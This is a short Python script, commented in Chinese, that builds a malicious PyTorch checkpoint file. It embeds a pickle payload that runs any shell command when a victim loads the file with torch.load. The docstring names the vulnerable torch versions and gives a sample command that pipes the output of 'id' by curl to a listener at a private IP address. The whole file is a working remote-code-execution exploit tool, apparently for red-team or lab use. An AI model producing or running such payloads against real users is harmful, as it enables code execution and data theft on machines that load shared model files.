#!/usr/bin/env python3
"""craft_pt.py — 纯 Python 构造带恶意 pickle 的 PyTorch checkpoint (.pt)
无需安装 PyTorch：torch.load() 默认反序列化 zip 包内的 archive/data.pkl，
触发 __reduce__ 执行任意命令（适用于 torch <= 2.5.1 或未显式指定 weights_only=True 的环境）。

用法:
    python3 craft_pt.py "<要执行的命令>" <输出文件名.pt>

示例:
    python3 craft_pt.py "id | curl -s -X POST --data-binary @- http://192.168.1.109:8888/loot" evil.pt
"""

import pickle
import sys
import zipfile


class RCE:
    def __init__(self, cmd: str):
        self.cmd = cmd

    def __reduce__(self):
        import subprocess

        return (subprocess.run, (["/bin/sh", "-c", self.cmd],))


def craft_checkpoint(cmd: str, output_path: str) -> None:
    payload = pickle.dumps(RCE(cmd))
    with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("archive/.format_version", b"3")
        z.writestr("archive/data.pkl", payload)
        z.writestr("archive/byteorder", b"little")
        z.writestr("archive/version", b"3\n")
    print(f"[+] 成功生成恶意 checkpoint: {output_path} (Payload: {cmd!r})")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"用法: {sys.argv[0]} <命令> <输出.pt>")
        sys.exit(1)
    craft_checkpoint(sys.argv[1], sys.argv[2])
